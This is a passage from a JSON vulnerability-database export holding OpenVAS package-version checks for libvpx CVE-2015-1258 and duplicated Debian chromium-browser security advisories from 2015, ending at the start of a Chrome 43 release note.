"Fedora Update for libvpx FEDORA-2015-15935", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869991", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869991", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libvpx FEDORA-2015-15935\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869991\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 12:42:09 +0200 (Tue, 06 Oct 2015)\");\n script_cve_id(\"CVE-2015-1258\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libvpx FEDORA-2015-15935\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libvpx'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libvpx on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-15935\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-October/168803.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"libvpx\", rpm:\"libvpx~1.3.0~7.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-09-25T00:00:00", "type": "openvas", "title": "Fedora Update for libvpx FEDORA-2015-15936", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869961", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869961", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libvpx FEDORA-2015-15936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869961\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-25 07:18:19 +0200 (Fri, 25 Sep 2015)\");\n script_cve_id(\"CVE-2015-1258\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libvpx FEDORA-2015-15936\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libvpx'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libvpx on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-15936\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-September/167428.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"libvpx\", rpm:\"libvpx~1.3.0~7.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:36", "description": "Mageia Linux Local Security Checks mgasa-2015-0249", "cvss3": {}, "published": "2015-10-15T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0249", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310130127", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130127", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0249.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130127\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:43:02 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0249\");\n script_tag(name:\"insight\", value:\"libvpx before 1.4.0 allows remote attackers to trigger a negative value for a size field, and consequently cause a denial of service or possibly have unspecified other impact, via a crafted frame size in VP9 video data (CVE-2015-1258)\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0249.html\");\n script_cve_id(\"CVE-2015-1258\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0249\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"libvpx\", rpm:\"libvpx~1.3.0~3.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T22:56:55", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3267-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nMay 22, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2015-1251 CVE-2015-1252 CVE-2015-1253 CVE-2015-1254\n CVE-2015-1255 CVE-2015-1256 CVE-2015-1257 CVE-2015-1258\n CVE-2015-1259 CVE-2015-1260 CVE-2015-1261 CVE-2015-1262\n CVE-2015-1263 CVE-2015-1264 CVE-2015-1265\n\nSeveral vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251\n\n SkyLined discovered a use-after-free issue in speech recognition.\n\nCVE-2015-1252\n\n An out-of-bounds write issue was discovered that could be used to\n escape from the sandbox.\n\nCVE-2015-1253\n\n A cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254\n\n A cross-origin bypass issue was discovered in the DOM editing feature.\n\nCVE-2015-1255\n\n Khalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256\n\n Atte Kettunen discovered a use-after-free issue in the SVG\n implementation.\n\nCVE-2015-1257\n\n miaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258\n\n cloudfuzzer discovered an invalid size parameter used in the\n libvpx library.\n\nCVE-2015-1259\n\n Atte Kettunen discovered an uninitialized memory issue in the\n pdfium library.\n\nCVE-2015-1260\n\n Khalil Zhani discovered multiple use-after-free issues in chromium's\n interface to the WebRTC library.\n\nCVE-2015-1261\n\n Juho Nurminen discovered a URL bar spoofing issue.\n\nCVE-2015-1262\n\n miaubiz discovered the use of an uninitialized class member in\n font handling.\n\nCVE-2015-1263\n\n Mike Ruddy discovered that downloading the spellcheck dictionary\n was not done over HTTPS.\n\nCVE-2015-1264\n\n K0r3Ph1L discovered a cross-site scripting issue that could be\n triggered by bookmarking a site.\n\nCVE-2015-1265\n\n The chrome 43 development team found and fixed various issues\n during internal auditing. Also multiple issues were fixed in\n the libv8 library, version 4.3.61.21.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 43.0.2357.65-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 43.0.2357.65-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-05-22T05:02:40", "type": "debian", "title": "[SECURITY] [DSA 3267-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-05-22T05:02:40", "id": "DEBIAN:DSA-3267-1:F1492", "href": "https://lists.debian.org/debian-security-announce/2015/msg00158.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-30T23:39:26", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3267-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nMay 22, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2015-1251 CVE-2015-1252 CVE-2015-1253 CVE-2015-1254\n CVE-2015-1255 CVE-2015-1256 CVE-2015-1257 CVE-2015-1258\n CVE-2015-1259 CVE-2015-1260 CVE-2015-1261 CVE-2015-1262\n CVE-2015-1263 CVE-2015-1264 CVE-2015-1265\n\nSeveral vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251\n\n SkyLined discovered a use-after-free issue in speech recognition.\n\nCVE-2015-1252\n\n An out-of-bounds write issue was discovered that could be used to\n escape from the sandbox.\n\nCVE-2015-1253\n\n A cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254\n\n A cross-origin bypass issue was discovered in the DOM editing feature.\n\nCVE-2015-1255\n\n Khalil Zhani discovered a use-after-free issue in WebAudio.\n\nCVE-2015-1256\n\n Atte Kettunen discovered a use-after-free issue in the SVG\n implementation.\n\nCVE-2015-1257\n\n miaubiz discovered an overflow issue in the SVG implementation.\n\nCVE-2015-1258\n\n cloudfuzzer discovered an invalid size parameter used in the\n libvpx library.\n\nCVE-2015-1259\n\n Atte Kettunen discovered an uninitialized memory issue in the\n pdfium library.\n\nCVE-2015-1260\n\n Khalil Zhani discovered multiple use-after-free issues in chromium's\n interface to the WebRTC library.\n\nCVE-2015-1261\n\n Juho Nurminen discovered a URL bar spoofing issue.\n\nCVE-2015-1262\n\n miaubiz discovered the use of an uninitialized class member in\n font handling.\n\nCVE-2015-1263\n\n Mike Ruddy discovered that downloading the spellcheck dictionary\n was not done over HTTPS.\n\nCVE-2015-1264\n\n K0r3Ph1L discovered a cross-site scripting issue that could be\n triggered by bookmarking a site.\n\nCVE-2015-1265\n\n The chrome 43 development team found and fixed various issues\n during internal auditing. Also multiple issues were fixed in\n the libv8 library, version 4.3.61.21.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 43.0.2357.65-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 43.0.2357.65-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-05-22T05:02:40", "type": "debian", "title": "[SECURITY] [DSA 3267-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-05-22T05:02:40", "id": "DEBIAN:DSA-3267-1:32EBE", "href": "https://lists.debian.org/debian-security-announce/2015/msg00158.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T22:46:32", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3238-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nApril 26, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2015-1235 CVE-2015-1236 CVE-2015-1237 CVE-2015-1238\n CVE-2015-1240 CVE-2015-1241 CVE-2015-1242 CVE-2015-1244\n CVE-2015-1245 CVE-2015-1246 CVE-2015-1247 CVE-2015-1248\n CVE-2015-1249 CVE-2015-3333 CVE-2015-3334 CVE-2015-3336\n\nSeveral vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1235\n\n A Same Origin Policy bypass issue was discovered in the HTML parser.\n\nCVE-2015-1236\n\n Amitay Dobo discovered a Same Origin Policy bypass in the Web Audio API.\n\nCVE-2015-1237\n\n Khalil Zhani discovered a use-after-free issue in IPC.\n\nCVE-2015-1238\n\n cloudfuzzer discovered an out-of-bounds write in the skia library.\n\nCVE-2015-1240\n\n w3bd3vil discovered an out-of-bounds read in the WebGL implementation.\n\nCVE-2015-1241\n\n Phillip Moon and Matt Weston discovered a way to trigger local user\n interface actions remotely via a crafted website.\n\nCVE-2015-1242\n\n A type confusion issue was discovered in the v8 javascript library.\n\nCVE-2015-1244\n\n Mike Ruddy discovered a way to bypass the HTTP Strict Transport Security\n policy.\n\nCVE-2015-1245\n\n Khalil Zhani discovered a use-after-free issue in the pdfium library.\n\nCVE-2015-1246\n\n Atte Kettunen discovered an out-of-bounds read issue in webkit/blink.\n\nCVE-2015-1247\n\n Jann Horn discovered that "file:" URLs in OpenSearch documents were not\n sanitized, which could allow local files to be read remotely when using\n the OpenSearch feature from a crafted website.\n\nCVE-2015-1248\n\n Vittorio Gambaletta discovered a way to bypass the SafeBrowsing feature,\n which could allow the remote execution of a downloaded executable file.\n\nCVE-2015-1249\n\n The chrome 41 development team found various issues from internal\n fuzzing, audits, and other studies.\n\nCVE-2015-3333\n\n Multiple issues were discovered and fixed in v8 4.2.7.14.\n\nCVE-2015-3334\n\n It was discovered that remote websites could capture video data from\n attached web cameras without permission.\n\nCVE-2015-3336\n\n It was discovered that remote websites could cause user interface\n disruptions like window fullscreening and mouse pointer locking.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 42.0.2311.90-1~deb8u1.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 42.0.2311.90-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-04-27T02:41:29", "type": "debian", "title": "[SECURITY] [DSA 3238-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249", "CVE-2015-3333", "CVE-2015-3334", "CVE-2015-3336"], "modified": "2015-04-27T02:41:29", "id": "DEBIAN:DSA-3238-1:9F70A", "href": "https://lists.debian.org/debian-security-announce/2015/msg00126.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-28T01:02:52", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3238-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nApril 26, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2015-1235 CVE-2015-1236 CVE-2015-1237 CVE-2015-1238\n CVE-2015-1240 CVE-2015-1241 CVE-2015-1242 CVE-2015-1244\n CVE-2015-1245 CVE-2015-1246 CVE-2015-1247 CVE-2015-1248\n CVE-2015-1249 CVE-2015-3333 CVE-2015-3334 CVE-2015-3336\n\nSeveral vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1235\n\n A Same Origin Policy bypass issue was discovered in the HTML parser.\n\nCVE-2015-1236\n\n Amitay Dobo discovered a Same Origin Policy bypass in the Web Audio API.\n\nCVE-2015-1237\n\n Khalil Zhani discovered a use-after-free issue in IPC.\n\nCVE-2015-1238\n\n cloudfuzzer discovered an out-of-bounds write in the skia library.\n\nCVE-2015-1240\n\n w3bd3vil discovered an out-of-bounds read in the WebGL implementation.\n\nCVE-2015-1241\n\n Phillip Moon and Matt Weston discovered a way to trigger local user\n interface actions remotely via a crafted website.\n\nCVE-2015-1242\n\n A type confusion issue was discovered in the v8 javascript library.\n\nCVE-2015-1244\n\n Mike Ruddy discovered a way to bypass the HTTP Strict Transport Security\n policy.\n\nCVE-2015-1245\n\n Khalil Zhani discovered a use-after-free issue in the pdfium library.\n\nCVE-2015-1246\n\n Atte Kettunen discovered an out-of-bounds read issue in webkit/blink.\n\nCVE-2015-1247\n\n Jann Horn discovered that "file:" URLs in OpenSearch documents were not\n sanitized, which could allow local files to be read remotely when using\n the OpenSearch feature from a crafted website.\n\nCVE-2015-1248\n\n Vittorio Gambaletta discovered a way to bypass the SafeBrowsing feature,\n which could allow the remote execution of a downloaded executable file.\n\nCVE-2015-1249\n\n The chrome 41 development team found various issues from internal\n fuzzing, audits, and other studies.\n\nCVE-2015-3333\n\n Multiple issues were discovered and fixed in v8 4.2.7.14.\n\nCVE-2015-3334\n\n It was discovered that remote websites could capture video data from\n attached web cameras without permission.\n\nCVE-2015-3336\n\n It was discovered that remote websites could cause user interface\n disruptions like window fullscreening and mouse pointer locking.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 42.0.2311.90-1~deb8u1.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 42.0.2311.90-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-04-27T02:41:29", "type": "debian", "title": "[SECURITY] [DSA 3238-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249", "CVE-2015-3333", "CVE-2015-3334", "CVE-2015-3336"], "modified": "2015-04-27T02:41:29", "id": "DEBIAN:DSA-3238-1:B141F", "href": "https://lists.debian.org/debian-security-announce/2015/msg00126.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T22:46:19", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3242-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nApril 30, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2015-1243 CVE-2015-1250\n\nSeveral vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1243\n\n Saif El-Sherei discovered a use-after-free issue.\n\nCVE-2015-1250\n\n The chrome 42 team found and fixed multiple issues during internal\n auditing.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 42.0.2311.135-1~deb8u1.\n\nFor the testing distribution (stretch), this problem will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 42.0.2311.135-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-05-01T11:55:26", "type": "debian", "title": "[SECURITY] [DSA 3242-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2015-05-01T11:55:26", "id": "DEBIAN:DSA-3242-1:F76F9", "href": "https://lists.debian.org/debian-security-announce/2015/msg00130.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-29T23:10:22", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3242-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nApril 30, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2015-1243 CVE-2015-1250\n\nSeveral vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1243\n\n Saif El-Sherei discovered a use-after-free issue.\n\nCVE-2015-1250\n\n The chrome 42 team found and fixed multiple issues during internal\n auditing.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 42.0.2311.135-1~deb8u1.\n\nFor the testing distribution (stretch), this problem will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 42.0.2311.135-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-05-01T11:55:26", "type": "debian", "title": "[SECURITY] [DSA 3242-1] chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2015-05-01T11:55:26", "id": "DEBIAN:DSA-3242-1:A1376", "href": "https://lists.debian.org/debian-security-announce/2015/msg00130.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "chrome": [{"lastseen": "2021-12-30T22:33:54", "description": "The Chrome team is happy to announce the promotion of Chrome 43 to the stable channel for Windows, Mac and Linux. Chrome 43.0.2357.65 contains a number of fixes and improvements. A list of changes is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/42.0.2311.0..43.0.2357.0?pretty=fuller&n=10000>). \n\n**Security Fixes and Rewards** \n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed. \n\nThis update includes [37 security 